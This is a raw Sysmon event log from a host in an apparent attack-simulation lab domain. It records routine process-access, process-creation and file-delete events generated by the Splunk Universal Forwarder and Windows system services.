10341000x8000000000000000807368Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807367Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807366Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807365Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807364Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807363Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:24.284{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807362Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.268{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807361Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:24.268{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807360Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.268{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F47C-60EB-6C79-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807359Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.268{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47C-60EB-6C79-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807358Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.253{0C1E0330-F47C-60EB-6C79-00000000D001}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807357Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:24.128{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF8D9428C8DD8B17B7CD72D600DF18DC,SHA256=A9B47DF70FA909DBE11CA3363E67806D84162C53944C3D5B982E528C300EFCCA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807401Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:25.784{0C1E0330-F47D-60EB-6E79-00000000D001}5843788C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807400Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F47D-60EB-6E79-00000000D001}584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807399Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807398Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807397Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807396Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807395Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807394Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807393Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807392Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.643{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807391Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:51:25.628{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807390Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.628{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F47D-60EB-6E79-00000000D001}584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807389Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.628{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F47D-60EB-6E79-00000000D001}584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807388Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.628{0C1E0330-F47D-60EB-6E79-00000000D001}584C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807387Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:25.268{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E00B404D86AA56F511649316B9BA5CB,SHA256=55121FFE55147D2FA324C96CE8C9090F571AC113613C68706794EC68815C07EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807386Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
